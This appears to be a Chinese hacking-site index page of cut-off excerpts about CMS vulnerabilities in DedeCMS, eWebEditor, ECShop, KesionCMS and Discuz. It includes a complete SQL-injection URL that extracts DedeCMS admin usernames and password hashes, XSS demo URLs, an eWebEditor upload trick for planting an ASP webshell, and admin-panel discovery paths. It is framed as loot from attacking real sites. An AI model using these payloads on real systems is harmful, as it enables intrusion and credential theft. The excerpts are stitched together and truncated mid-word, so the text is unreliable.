网络安全 > 漏洞分析 >
ckeditor/DesignCms上传漏洞
今天日站发现的.... http://www.xxx.net/manage/Modle/UploadFile/ListFiles.aspx 上传洞洞 上传后没改文件名!可以IIS解析 后面的事,你懂的~ 有点像FCK ... 我晕了...这程式漏洞真多 刚又发现了...有点像shell的管理界面 可以修改 新建 等织梦管理系统后台查找
有时在通过注射得到织梦程序的管理密码时,却发现找不到后台地址。。 这个时候 大家可以尝试下在地址后面加上:/include/dialog/select_media.php?f=form1.murl 但不一定通杀。。EXCMS 0day (过程精彩)
以下版本没测试 测试的是最新版本 在公布前几小时没有通知官方 ^_^ 哈哈 为什么说过程精彩呢? 看完就明白! 因为这个漏洞原因非一般! 同时映射出中国软件行业的悲哀!!! 经典对白 看代码 后台登录文件 adminModulesAuthIndex.php ifdedecms 5.6的最新注入漏洞
最新dedecms 5.6的注入代码: http://www.dedecms.com/plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2%29%29%20AND%20%22%27%22%20AND%20updatexml%281,%28SELECT%20CONCAT%280x5b,uname,0x3a,MID%28pwd,4,16%29,0x5d%29%20FROM%20dede_admin%29,1%29%23%27][0]=dedecms织梦 v5.5 两处跨站漏洞
影响版本: dedecms织梦5.5 漏洞描述: demo1:http://www.dedecms.com/plus/search.php?keyword=%22>&searchtype=titlekeyword&channeltype=0&orderby=&kwtype=1&pagesize=10&typeid=0&TotalResult=&PageNo=2demo2:htecshop爆绝对路径的bug
ecshop爆绝对路径的bug 网址如下" http://www.zzfhw.com/ECShop/includes/fckeditor/editor/dialog/fck_spellerpages/spellerpages/server-scripts/spellchecker.phpPHP漏洞全解
PHP网页的安全性问题,针对PHP的网站主要存在下面几种攻击方式ewebeditor通杀鸡肋0day漏洞
先访问这个地址 Editor/asp/upload.asp?action=save&type=image&style=popup&cusdir=a.asp 访问这个地址可以建立个A.ASP的文件夹…… 再用这个html代码上传。 <form action="http://www.zzfhw.com/Editor/asp/upload.asp?action=sav织梦网官方(dedecms)爆路径最新漏洞
首发:红科网安 作者:Amxking 漏洞程序:dedecms5.5 测试对象:织梦网CMS官方网站 提交时间:2010-03-17 漏洞类型:信息泄露 危险等级:低 漏洞描述: dedecms 5.5程序泄露网站路径信息。 测试地址: http://www.dedecDISCUZ X1.5 本地文件包含漏洞说明
DISCUZX1.5 本地文件包含,当然是有条件的,就是使用文件作为缓存。科讯 kesioncms 5.5以下漏洞拿shell方法原理总结(图文)
科讯做为一个强大的cms程序大多被政府和教育机构网站所使用,关于科讯的漏洞利用教程网上不是很多。由于科讯的后台登陆需要输入认证码,而认证码没有保存在数据库而是保存在asp文件中,所以在某种程度上增大了拿shell 的难度。下面就个版本拿shell 的方法做一总结。科汛 KesionCMS 文件名解析漏洞
科汛cms,eshop系统建站第一品牌.专业提供开源cms项目定制服务及名片系统,在线输出,在线印刷,广告制作,在线图文下单系统提供商。KesionCMS(科讯)上传漏洞与防范方法
有点鸡肋,配合前几天公布的iis6文件名解析漏洞达到获取webshell的目的。科讯网站管理系统 Kesion v6.5 CMS Oday 利用工具
通过自己构造参数AutoReName=3,可以将上传的文件名保存原样,通过截断可以直接得到SHELL限制,后台禁止了注册,或者禁止了上传,或者把user目录删除了,优点是不用找后台,开放就死。discuz!7.1、7.2 远程代码执行漏洞exp
使用exp的话仅限本机测试,其他用途后果自负!